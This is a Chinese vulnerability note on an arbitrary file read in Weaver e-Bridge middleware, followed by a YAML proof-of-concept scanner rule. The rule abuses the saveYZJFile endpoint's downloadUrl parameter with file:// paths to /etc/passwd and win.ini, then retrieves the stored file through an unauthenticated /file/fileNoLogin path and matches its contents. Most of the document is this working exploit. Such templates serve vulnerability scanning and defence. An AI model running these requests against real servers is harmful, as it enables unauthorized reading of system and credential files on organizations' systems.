漏洞描述
泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
title="泛微云桥e-Bridge"
e-bridge-saveyzjfile-file-read: 泛微OA E-Bridge saveYZJFile 任意文件读取
PoC代码[已公开]
id: e-bridge-saveyzjfile-file-read
info:
name: 泛微OA E-Bridge saveYZJFile 任意文件读取
author: mvhz81
severity: high
verified: true
description: |
泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
title="泛微云桥e-Bridge"
rules:
linux0:
request:
method: GET
path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc//passwd&fileExt=txt
expression: response.status == 200 && response.body.bcontains(b'"isencrypt":') && response.body.bcontains(b'"isdelete":')
output:
search: '"\\\"id\\\"\\:\\\"(?P<var>.+?)\\\"\\,".bsubmatch(response.body)'
var: search["var"]
linux1:
before_sleep: 2
request:
method: GET
path: /file/fileNoLogin/{{var}}
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
stop_if_match: true
windows0:
request:
method: GET
path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
expression: response.status == 200 && response.body.bcontains(b'"isencrypt":') && response.body.bcontains(b'"isdelete":')
output:
search2: '"\\\"id\\\"\\:\\\"(?P<var>.+?)\\\"\\,".bsubmatch(response.body)'
var: search2["var"]
stop_if_mismatch: true
windows1:
before_sleep: 2
request:
method: GET
path: /file/fileNoLogin/{{var}}
expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
expression: (linux0() && linux1()) || (windows0() && windows1())